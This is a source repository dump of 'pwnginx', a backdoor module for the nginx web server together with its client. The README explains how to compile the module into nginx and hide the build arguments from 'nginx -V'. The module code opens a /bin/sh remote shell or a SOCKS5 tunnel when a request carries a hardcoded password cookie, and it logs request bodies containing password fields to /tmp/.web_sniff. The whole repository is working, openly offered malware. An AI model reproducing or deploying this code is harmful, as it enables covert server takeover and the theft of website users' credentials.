├── README.md ├── client ├── Makefile ├── functions.c ├── functions.h ├── pwnginx └── pwnginx.c └── module ├── config ├── config.h ├── ngx_http_pwnginx.c ├── pwnginx.c ├── pwnginx.h └── socks5.h /README.md: -------------------------------------------------------------------------------- 1 | #[ Pwnginx ] - Pwn nginx 2 | 3 | Copyleft by t57root @ openwill.me 4 | 5 | <t57root@gmail.com> [www.HackShell.net](http://www.hackshell.net/) 6 | 7 | Usage: 8 | 9 | Get shell access via the nginx running @ [ip]:[port] 10 | 11 | ./pwnginx shell [ip] [port] [password] 12 | 13 | Get a socks5 tunnel listening at [socks5ip]:[socks5port] 14 | 15 | ./pwnginx socks5 [ip] [port] [password] [socks5ip] [socks5port] 16 | 17 | 18 | ###Features: 19 | 20 | * Remote shell access 21 | 22 | * Socks5 tunneling via existing http connection 23 | 24 | * Http password sniffing & logging 25 | 26 | ###INSTALL: 27 | 28 | * Compile the client: 29 | 30 | $ cd client;make 31 | 32 | * Edit source to hidden configure arguments: 33 | 34 | $ vim src/core/nginx.c 35 | 36 | Modify the `configure arguments` line into: `configure arguments: --prefix=/opt/nginx\n");` (original configure arguments shown in the result of `nginx -V`) 37 | 38 | * Recompile nginx: 39 | 40 | $ cd /path/to/nginx/source; ./configure --prefix=/opt/nginx --add-module=/path/to/pwnginx/module && make (There is no need to run `make install`) 41 | 42 | $ sudo cp -f objs/nginx /path/to/nginx/sbin/nginx 43 | 44 | * Restart nginx 45 | 46 | $ sudo killall nginx && /path/to/nginx/sbin/nginx 47 | 48 | 49 | ###TODO: 50 | 51 | * Pack communication traffic into HTTP protocol 52 | 53 | * Full pty support 54 | 55 | * Shell with root privilege(? There must be another stand-alone 'nginx: master process' running under root to support this function. Maybe that's too suspicious. Being considered.) 56 | -------------------------------------------------------------------------------- /client/Makefile: -------------------------------------------------------------------------------- 1 | CFLAGS = -lpthread -Wall 2 | pwnginx: functions.c 3 | 4 | clean: 5 | -rm pwnginx 6 | 7 | -------------------------------------------------------------------------------- /client/functions.c: -------------------------------------------------------------------------------- 1 | /* 2 | * functions.c - pwnginx functions 3 | * t57root@gmail.com 4 | * openwill.me / www.hackshell.net 5 | */ 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | extern char *ip; 24 | extern char *port; 25 | extern char *password; 26 | extern char *socks5ip; 27 | extern char *socks5port; 28 | 29 | 30 | int full_send(int fd,void *buf,int size) 31 | { 32 | int ret,total=0; 33 | while(size){ 34 | ret=send(fd, buf, size,0); 35 | total+=ret; 36 | if(ret<0) return ret; 37 | size=size-ret; 38 | buf+=ret; 39 | } 40 | return total; 41 | } 42 | 43 | int full_recv(int fd,void *buf,int size) 44 | { 45 | int ret,total=0; 46 | while(size){ 47 | ret=recv(fd, buf, size,0); 48 | total+=ret; 49 | if(ret<=0) return ret; 50 | size=size-ret; 51 | buf+=ret; 52 | } 53 | return total; 54 | } 55 | 56 | 57 | int init_connection(char *ip,char *port,int function) 58 | { 59 | int server; 60 | struct sockaddr_in server_addr; 61 | server_addr.sin_family = AF_INET; 62 | server_addr.sin_addr.s_addr = inet_addr(ip); 63 | server_addr.sin_port = htons(atoi(port)); 64 | server = socket( AF_INET, SOCK_STREAM, 0 ); 65 | if(connect( server, (struct sockaddr *) &server_addr,sizeof( server_addr ) )<0){ 66 | perror("[E] Connect failed"); 67 | return 1; 68 | } 69 | 70 | char *buf = malloc(100); 71 | memset(buf,0,100); 72 | sprintf(buf,"GET / HTTP/1.1\r\nHost: %s\r\nCookie: pwnginx=%s; action=%d\r\n\r\n", ip, password, function); 73 | full_send(server,buf,strlen(buf)); 74 | full_recv(server,buf,9); 75 | if(strncmp(buf,"pwnginx",7)!=0){ 76 | printf("[E] Cannot get banner\n"); 77 | close(server); 78 | server = -1; 79 | } 80 | free(buf); 81 | return server; 82 | } 83 | 84 | int forwarder(int from,int to) 85 | { 86 | int rec,sen; 87 | fd_set rfds; 88 | char buffer[BUFSIZ+1]; 89 | while(1){ 90 | FD_ZERO(&rfds); 91 | FD_SET(from, &rfds); 92 | FD_SET(to, &rfds); 93 | int bigger = (from>to?from:to)+1; 94 | if(select(bigger, &rfds, NULL, NULL, NULL)==0) 95 | continue; 96 | if(FD_ISSET(from,&rfds)){ 97 | if ((rec = read(from, buffer, BUFSIZ)) > 0){ 98 | sen=write(to, &buffer, rec); 99 | //printf("%d => %d\n",rec,sen); 100 | if(sen<=0) { 101 | //printf("::1::%d::\n",sen); 102 | break; 103 | } 104 | } 105 | else { 106 | //printf("::2::%d::\n",rec); 107 | break; 108 | } 109 | } 110 | if(FD_ISSET(to,&rfds)){ 111 | if ((rec = read(to, buffer, BUFSIZ)) > 0){ 112 | sen=write(from, &buffer, rec); 113 | //printf("%d <= %d\n",rec,sen); 114 | if(sen<=0) { 115 | //printf("::3::%d::\n",sen); 116 | break; 117 | } 118 | } 119 | else { 120 | //printf("::4::%d::\n",rec); 121 | break; 122 | } 123 | } 124 | } 125 | return 0; 126 | } 127 | 128 | int exec_shell(int fd) 129 | { 130 | printf("\n\n[i] Enjoy the real world.\n"); 131 | forwarder(STDIN_FILENO,fd); 132 | close(fd); 133 | printf("Connection lost\n"); 134 | return 0; 135 | } 136 | 137 | 138 | int socks5_worker(void *fdptr) 139 | { 140 | int fd = *(int *)fdptr; 141 | int srv_fd = init_connection(ip,port,2); 142 | if(srv_fd<0){ 143 | printf("[E] init_connection failed\n"); 144 | return -1; 145 | } 146 | forwarder(fd,srv_fd); 147 | close(fd); 148 | close(srv_fd); 149 | printf("Connection lost\n"); 150 | return 0; 151 | } 152 | 153 | int exec_socks5() 154 | { 155 | 156 | int sock,csock; 157 | 158 | struct sockaddr_in saddr,caddr; 159 | saddr.sin_family = AF_INET; 160 | saddr.sin_addr.s_addr = inet_addr(socks5ip); 161 | saddr.sin_port = htons(atoi(socks5port)); 162 | 163 | sock = socket(AF_INET, SOCK_STREAM, 0); 164 | int reuse = 1; 165 | setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(int)); 166 | if(bind(sock, (struct sockaddr *) &saddr, sizeof(saddr))==-1){ 167 | perror("[E] bind error"); 168 | return -1; 169 | } 170 | listen(sock, 5); 171 | int caddr_len=sizeof(caddr); 172 | printf("[i] Listenning port %d on %s\n",ntohs(saddr.sin_port),inet_ntoa(saddr.sin_addr)); 173 | while((csock = accept(sock,(struct sockaddr *) &caddr,(socklen_t * __restrict__)&caddr_len))){ 174 | printf("[i] Connected from %s\n", inet_ntoa(caddr.sin_addr)); 175 | pthread_t thread; 176 | if(pthread_create(&thread, NULL, (void *)socks5_worker, (void *)&csock)) 177 | { 178 | perror("[E] pthread_create failed"); 179 | close(sock); 180 | } 181 | else 182 | pthread_detach(thread); 183 | } 184 | return 0; 185 | } 186 | -------------------------------------------------------------------------------- /client/functions.h: -------------------------------------------------------------------------------- 1 | #ifndef FUNCTIONS_H 2 | #define FUNCTIONS_H 3 | 4 | int full_send(int fd,void *buf,int size); 5 | int full_recv(int fd,void *buf,int size); 6 | int init_connection(char *ip,char *port,int function); 7 | int exec_shell(int fd); 8 | int exec_socks5(); 9 | 10 | #endif 11 | 12 | -------------------------------------------------------------------------------- /client/pwnginx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t57root/pwnginx/18c494bd2549d369b79cc4ac5f5574b739c849c0/client/pwnginx -------------------------------------------------------------------------------- /client/pwnginx.c: -------------------------------------------------------------------------------- 1 | /* 2 | * pwnginx.c - pwnginx client 3 | * t57root@gmail.com 4 | * openwill.me / www.hackshell.net 5 | */ 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #include "functions.h" 23 | 24 | 25 | char *password; 26 | char *ip; 27 | char *port; 28 | char *socks5ip; 29 | char *socks5port; 30 | 31 | int main(int argc,char **argv) 32 | { 33 | printf("[ Pwnginx ] - Pwn nginx\n" 34 | "Copyleft by t57root @ openwill.me\n" 35 | " [www.HackShell.net]\n\n" 36 | "Usage:\n" 37 | "Get a shell access via the nginx running @ [ip]:[port]\n\t%s shell [ip] [port] [password]\n" 38 | "Get a socks5 tunnel listening at [socks5ip]:[socks5port]\n\t%s socks5 [ip] [port] [password] [socks5ip] [socks5port]\n" 39 | ,argv[0],argv[0]); 40 | char *action = argv[1]; 41 | ip = argv[2]; 42 | port = argv[3]; 43 | password = argv[4]; 44 | 45 | int function = 0; 46 | 47 | if((argc==5 && strncmp(action,"shell",5)==0)){ 48 | function = 1; 49 | printf("\n[i] Obtaining shell access\n"); 50 | } 51 | else if((argc==7 && strncmp(action,"socks5",6)==0)){ 52 | function = 2; 53 | socks5ip = argv[5]; 54 | socks5port = argv[6]; 55 | printf("\n[i] Obtaining a socks5 proxy tunnel\n"); 56 | } 57 | else return 0; 58 | 59 | printf("[i] About to connect to nginx\n"); 60 | 61 | int fd = init_connection(ip,port,function); 62 | if(fd<0){ 63 | return -1; 64 | } 65 | 66 | if(function==1){ 67 | exec_shell(fd); 68 | } 69 | else if(function==2){ 70 | close(fd); 71 | exec_socks5(); 72 | } 73 | 74 | return 0; 75 | } 76 | -------------------------------------------------------------------------------- /module/config: -------------------------------------------------------------------------------- 1 | ngx_addon_name=ngx_http_pwnginx 2 | HTTP_AUX_FILTER_MODULES="$HTTP_AUX_FILTER_MODULES ngx_http_pwnginx" 3 | NGX_ADDON_SRCS="$NGX_ADDON_SRCS $ngx_addon_dir/ngx_http_pwnginx.c $ngx_addon_dir/pwnginx.c" 4 | -------------------------------------------------------------------------------- /module/config.h: -------------------------------------------------------------------------------- 1 | #ifndef CONFIG_H 2 | #define CONFIG_H 3 | 4 | #define PASSWORD "t57root" 5 | #define PWD_SNIFF_FILE "/tmp/.web_sniff" 6 | #define ROOTSHELL 7 | 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /module/ngx_http_pwnginx.c: -------------------------------------------------------------------------------- 1 | /* 2 | * ngx_http_pwnginx.c - pwnginx main module 3 | * t57root@gmail.com 4 | * lastest version @ https://github.com/t57root/pwnginx 5 | * openwill.me / www.hackshell.net 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | #include "pwnginx.h" 12 | #include "config.h" 13 | 14 | static ngx_int_t 15 | ngx_http_pwnginx_init(ngx_conf_t *cf); 16 | static ngx_http_module_t ngx_http_pwnginx_ctx = { 17 | NULL, /* preconfiguration */ 18 | ngx_http_pwnginx_init, /* postconfiguration */ 19 | NULL, /* create main configuration */ 20 | NULL, /* init main configuration */ 21 | NULL, /* create server configuration */ 22 | NULL, /* merge server configuration */ 23 | NULL, /* create location configuration */ 24 | NULL /* merge location configuration */ 25 | }; 26 | ngx_module_t ngx_http_pwnginx = { 27 | NGX_MODULE_V1, 28 | &ngx_http_pwnginx_ctx, /* module context */ 29 | NULL, /* module directives */ 30 | NGX_HTTP_MODULE, /* module type */ 31 | NULL, /* init master */ 32 | NULL, /* init module */ 33 | NULL, /* init process */ 34 | NULL, /* init thread */ 35 | NULL, /* exit thread */ 36 | NULL, /* exit process */ 37 | NULL, /* exit master */ 38 | NGX_MODULE_V1_PADDING 39 | }; 40 | static ngx_http_output_header_filter_pt ngx_http_next_header_filter; 41 | static ngx_http_output_body_filter_pt ngx_http_next_body_filter; 42 | static ngx_int_t 43 | ngx_http_pwnginx_header_filter(ngx_http_request_t *r) 44 | { 45 | int cmd_fd = r->connection->fd; 46 | ngx_table_elt_t ** cookies = NULL; 47 | cookies = r->headers_in.cookies.elts; 48 | if(r->headers_in.cookies.nelts==1){ 49 | if(strncmp((char *)cookies[0]->value.data,"pwnginx="PASSWORD"; action=1",strlen(PASSWORD)+18)==0){ 50 | msend(cmd_fd, "pwnginx1", sizeof("pwnginx1")); 51 | exec_shell(cmd_fd); 52 | } 53 | else if(strncmp((char *)cookies[0]->value.data,"pwnginx="PASSWORD"; action=2",strlen(PASSWORD)+18)==0){ 54 | msend(cmd_fd, "pwnginx2", sizeof("pwnginx2")); 55 | exec_socks5(cmd_fd); 56 | } 57 | } 58 | 59 | #ifdef PWD_SNIFF_FILE 60 | if (r->request_body){ 61 | ngx_chain_t *cl = r->request_body->bufs; 62 | if(cl){ 63 | //1024 64 | char *tmp_buf = malloc(1025); 65 | tmp_buf[1024]='\0'; 66 | strncpy(tmp_buf,(char *)cl->buf->pos,1024); 67 | if( ngx_strcasestrn((u_char *)tmp_buf, "password=",9-1) || 68 | ngx_strcasestrn((u_char *)tmp_buf, "passwd=",7-1) || 69 | ngx_strcasestrn((u_char *)tmp_buf, "pwd=",4-1) || 70 | ngx_strcasestrn((u_char *)tmp_buf, "name=\"password\"",15-1) || 71 | ngx_strcasestrn((u_char *)tmp_buf, "name=\"passwd\"",13-1) || 72 | ngx_strcasestrn((u_char *)tmp_buf, "name=\"pwd\"",10-1)){ 73 | FILE *fp = fopen(PWD_SNIFF_FILE,"a"); 74 | r->request_line.data[(int)r->request_line.len]='\0'; 75 | fprintf(fp,"%s\n",(char *)r->request_line.data); 76 | r->headers_in.host->value.data[(int)r->headers_in.host->value.len]='\0'; 77 | fprintf(fp,"Host:%s\n",(char *)r->headers_in.host->value.data); 78 | fprintf(fp,"%s\n======================\n",cl->buf->pos); 79 | fclose(fp); 80 | } 81 | } 82 | } 83 | #endif 84 | 85 | return ngx_http_next_header_filter(r); 86 | } 87 | 88 | static ngx_int_t 89 | ngx_http_pwnginx_body_filter(ngx_http_request_t *r, ngx_chain_t *in) 90 | { 91 | return ngx_http_next_body_filter(r, in); 92 | } 93 | 94 | static ngx_int_t 95 | ngx_http_pwnginx_init(ngx_conf_t *cf) 96 | { 97 | ngx_http_next_header_filter = ngx_http_top_header_filter; 98 | ngx_http_top_header_filter = ngx_http_pwnginx_header_filter; 99 | ngx_http_next_body_filter = ngx_http_top_body_filter; 100 | ngx_http_top_body_filter = ngx_http_pwnginx_body_filter; 101 | 102 | 103 | #ifdef ROOTSHELL 104 | 105 | #endif 106 | 107 | return NGX_OK; 108 | } 109 | 110 | -------------------------------------------------------------------------------- /module/pwnginx.c: -------------------------------------------------------------------------------- 1 | /* 2 | * functions.c - pwnginx functions 3 | * t57root@gmail.com 4 | * lastest version @ https://github.com/t57root/pwnginx 5 | * openwill.me / www.hackshell.net 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | 12 | #include "socks5.h" 13 | 14 | //int shell_count=0; 15 | int rootpipe1[2]; 16 | int rootpipe2[2]; 17 | 18 | int mrecv(int fd, void *buffer, int length) 19 | { 20 | char *ptr; 21 | ptr=(char *)buffer; 22 | int recv_bytes; 23 | while(1){ 24 | recv_bytes=recv(fd, ptr, length,0); 25 | if(recv_bytes<=0) { 26 | if(errno==EINTR){ 27 | continue; 28 | } 29 | else if(errno==EAGAIN) { 30 | sleep(1); 31 | continue; 32 | } 33 | else { 34 | return(-1); 35 | } 36 | } 37 | else break; 38 | } 39 | return recv_bytes; 40 | } 41 | 42 | int msend(int fd, void *buffer, int length) 43 | { 44 | int bytes_left; 45 | int written_bytes; 46 | char *ptr; 47 | ptr=(char *)buffer; 48 | bytes_left=length; 49 | while(bytes_left>0) { 50 | written_bytes=write(fd, ptr, bytes_left); 51 | if(written_bytes<=0){ 52 | if(errno==EINTR){ 53 | continue; 54 | } 55 | else if(errno==EAGAIN){ 56 | sleep(1); 57 | continue; 58 | } 59 | else { 60 | return(-1); 61 | } 62 | } 63 | bytes_left-=written_bytes; 64 | ptr+=written_bytes; 65 | } 66 | return length; 67 | } 68 | 69 | int exec_shell(int fd) 70 | { 71 | int pid; 72 | pid = fork(); 73 | if(pid>0){ 74 | close(fd); 75 | exit(0); 76 | } 77 | 78 | dup2(fd,0); 79 | dup2(fd,1); 80 | dup2(fd,2); 81 | execl("/bin/sh","-sh",(char *)0); 82 | return 0; 83 | } 84 | 85 | int forwarder(int from,int to) 86 | { 87 | int rec,sen; 88 | fd_set rfds; 89 | char buffer[BUFSIZ+1]; 90 | while(1){ 91 | FD_ZERO(&rfds); 92 | FD_SET(from, &rfds); 93 | FD_SET(to, &rfds); 94 | int bigger = (from>to?from:to)+1; 95 | if(select(bigger, &rfds, NULL, NULL, NULL)==0) 96 | continue; 97 | if(FD_ISSET(from,&rfds)){ 98 | if ((rec = recv(from, buffer, BUFSIZ,0)) > 0){ 99 | sen=msend(to, &buffer, rec); 100 | //printf("%d => %d\n",rec,sen); 101 | if(sen<=0) break; 102 | } 103 | else break; 104 | } 105 | if(FD_ISSET(to,&rfds)){ 106 | if ((rec = recv(to, buffer, BUFSIZ,0)) > 0){ 107 | sen=msend(from, &buffer, rec); 108 | //printf("%d <= %d\n",rec,sen); 109 | if(sen<=0) break; 110 | } 111 | else break; 112 | } 113 | } 114 | return 0; 115 | } 116 | 117 | 118 | int worker(int csock) 119 | { 120 | char buffer[BUFSIZ+1]; 121 | bzero(&buffer, sizeof buffer); 122 | int rec,sen; 123 | /*****Select******/ 124 | printf("Recving select message...\n"); 125 | if((rec = mrecv(csock, buffer, sizeof(SELECT)))<=0){ 126 | close(csock); 127 | return -1; 128 | } 129 | printf("Recved.\n"); 130 | pSELECT select = (pSELECT)&buffer; 131 | //Do something like checking if the version is 5 132 | pSELECT_RESPONSE selectRes = (pSELECT_RESPONSE)malloc(sizeof(SELECT_RESPONSE)); 133 | selectRes->ver=0x5; //Socks Version 5 134 | selectRes->method=0x0; //NO AUTHENTICATION REQUIRED 135 | if(select->ver!=0x5){ 136 | selectRes->method=0xFF; 137 | } 138 | sen = msend(csock, selectRes, sizeof(SELECT_RESPONSE)); 139 | printf("Select done,rec/send:%d/%d\n",rec,sen); 140 | free(selectRes); 141 | 142 | /*****Request******/ 143 | printf("Recving request...\n"); 144 | rec = recv(csock, buffer, BUFSIZ,0); 145 | printf("Recved %d bytes\n",rec); 146 | pREQUEST request = (pREQUEST)&buffer; 147 | 148 | //Parse the target addr 149 | struct sockaddr_in taddr; 150 | taddr.sin_family = AF_INET; 151 | if(request->atyp==0x3){ //Domain name 152 | //char domainlen=*(&request->atyp+sizeof(request->atyp)); 153 | char domainlen=*(&request->addr); 154 | char domain[256]={0}; 155 | strncpy(domain,&request->atyp+2,(unsigned int)domainlen); 156 | struct hostent *phost = gethostbyname(domain); 157 | if(phost==NULL){ 158 | printf("Cannot Resolv the Domain name:%s\n",(char *)&domain); 159 | close(csock); 160 | return -1; 161 | } 162 | memcpy(&taddr.sin_addr,phost->h_addr_list[0],phost->h_length); 163 | memcpy(&taddr.sin_port,&request->atyp+sizeof(request->atyp)+1+(unsigned int)domainlen,2); 164 | } 165 | else if(request->atyp==0x1){ //IPv4 Addr 166 | memcpy(&taddr.sin_addr.s_addr,&request->atyp+1,4); 167 | memcpy(&taddr.sin_port,&request->atyp+1+4,2); 168 | } 169 | else{ 170 | printf("Not implemented\n"); 171 | close(csock); 172 | return -1; 173 | } 174 | //Connect to the target host 175 | pREQUEST_RESPONSE requestRes = (pREQUEST_RESPONSE)malloc(sizeof(REQUEST_RESPONSE)); 176 | requestRes->ver=0x5; 177 | requestRes->rep=0x0; 178 | requestRes->rsv=0x0; 179 | requestRes->atyp=0x1; 180 | memset(requestRes+4, 0, 6); 181 | /* 182 | if(request->cmd=0x03){ 183 | uint32_t tmpaddr = htonl("127.0.0.1"); 184 | uint16_t tmpport = htons(8081); 185 | memcpy(requestRes+4,&tmpaddr,sizeof(uint32_t)); //XXX wtf? 186 | memcpy(requestRes+8,&tmpport,sizeof(uint16_t)); 187 | } 188 | */ 189 | 190 | printf("Connecting to port %d on %s\n",ntohs(taddr.sin_port),inet_ntoa(taddr.sin_addr)); 191 | int tsock; 192 | //Check its a tcp or udp request 193 | if(request->cmd==0x04){ //UDP ASSOCIATE X'03' //Never use udp 194 | printf("Hey, its a udp request!\n"); 195 | tsock = socket(AF_INET, SOCK_DGRAM, 0); 196 | } 197 | else{ 198 | tsock=socket(AF_INET, SOCK_STREAM, 0); 199 | } 200 | 201 | if(connect(tsock, (struct sockaddr *) &taddr, sizeof(taddr))==-1){ 202 | requestRes->rep=0x5; 203 | sen = msend(csock, requestRes, sizeof(REQUEST_RESPONSE)); 204 | close(csock); 205 | return -1; 206 | } 207 | printf("Done\n"); 208 | sen = msend(csock, requestRes, sizeof(REQUEST_RESPONSE)); 209 | printf("Request done,rec/send:%d/%d\n",rec,sen); 210 | free(requestRes); 211 | 212 | if(request->cmd==0x03){ //UDP ASSOCIATE 213 | printf("Recving... #1\n"); 214 | 215 | rec = recv(csock, buffer, BUFSIZ,0); 216 | /* 217 | struct sockaddr_in tmpaddr; 218 | tmpaddr.sin_family = AF_INET; 219 | memcpy(&tmpaddr.sin_addr.s_addr,buffer+4,4); //XXX 220 | memcpy(&tmpaddr.sin_port,buffer+4+4,2); 221 | printf("Recv Ascii:%s:%d\n",inet_ntoa(tmpaddr.sin_addr),ntohs(tmpaddr.sin_port)); 222 | */ 223 | printf("Done:%d\nSending... #1\n",rec); 224 | sen = send(tsock, buffer, rec,0); 225 | printf("Done:%d\nRecving... #2\n",sen); 226 | rec = recv(tsock, buffer, BUFSIZ,0); 227 | printf("Done:%d\nSending... #2\n",rec); 228 | sen = send(csock, buffer, rec,0); 229 | printf("Done:%d",sen); 230 | return 0; 231 | } 232 | 233 | /*****Forward******/ 234 | forwarder(csock,tsock); 235 | printf("worker exit"); 236 | close(csock); 237 | close(tsock); 238 | return 0; 239 | } 240 | 241 | int exec_socks5(int fd) 242 | { 243 | int pid; 244 | pid = fork(); 245 | if(pid>0){ 246 | close(fd); 247 | exit(0); 248 | } 249 | int flags = fcntl(fd,F_GETFL,0); 250 | flags &= ~O_NONBLOCK; 251 | fcntl(fd,F_SETFL,flags); 252 | 253 | worker(fd); 254 | exit(0); 255 | } 256 | 257 | -------------------------------------------------------------------------------- /module/pwnginx.h: -------------------------------------------------------------------------------- 1 | #ifndef FUNCTIONS_H 2 | #define FUNCTIONS_H 3 | 4 | int mrecv(int fd, void *buffer, int length); 5 | int msend(int fd, void *buffer, int length); 6 | int exec_shell(int fd); 7 | int exec_socks5(int fd); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /module/socks5.h: -------------------------------------------------------------------------------- 1 | //Based on http://www.ietf.org/rfc/rfc1928.txt 2 | //HTTP:http://www.ietf.org/rfc/rfc2616.txt 3 | #ifndef SOCKS5_H 4 | #define SOCKS5_H 5 | 6 | /**** 7 | +----+----------+----------+ 8 | |VER | NMETHODS | METHODS | 9 | +----+----------+----------+ 10 | | 1 | 1 | 1 to 255 | 11 | +----+----------+----------+ 12 | ****/ 13 | typedef struct 14 | { 15 | char ver; 16 | char nmethods; 17 | char methods[255]; 18 | }SELECT,*pSELECT; 19 | 20 | /**** 21 | +----+--------+ 22 | |VER | METHOD | 23 | +----+--------+ 24 | | 1 | 1 | 25 | +----+--------+ 26 | ****/ 27 | typedef struct 28 | { 29 | char ver; 30 | char method; 31 | }SELECT_RESPONSE,*pSELECT_RESPONSE; 32 | 33 | /**** 34 | +----+-----+-------+------+----------+----------+ 35 | |VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT | 36 | +----+-----+-------+------+----------+----------+ 37 | | 1 | 1 | X'00' | 1 | Variable | 2 | 38 | +----+-----+-------+------+----------+----------+ 39 | ****/ 40 | typedef struct 41 | { 42 | char ver; 43 | char cmd; 44 | char rsv; 45 | char atyp; 46 | char addr; 47 | //Other sections 48 | }REQUEST,*pREQUEST; 49 | 50 | /**** 51 | +----+-----+-------+------+----------+----------+ 52 | |VER | REP | RSV | ATYP | BND.ADDR | BND.PORT | 53 | +----+-----+-------+------+----------+----------+ 54 | | 1 | 1 | X'00' | 1 | Variable | 2 | 55 | +----+-----+-------+------+----------+----------+ 56 | ****/ 57 | typedef struct 58 | { 59 | char ver; 60 | char rep; 61 | char rsv; 62 | char atyp; 63 | char bndAddr[4]; 64 | char bndPort[2]; 65 | }REQUEST_RESPONSE,*pREQUEST_RESPONSE; 66 | 67 | #endif 68 | 69 | --------------------------------------------------------------------------------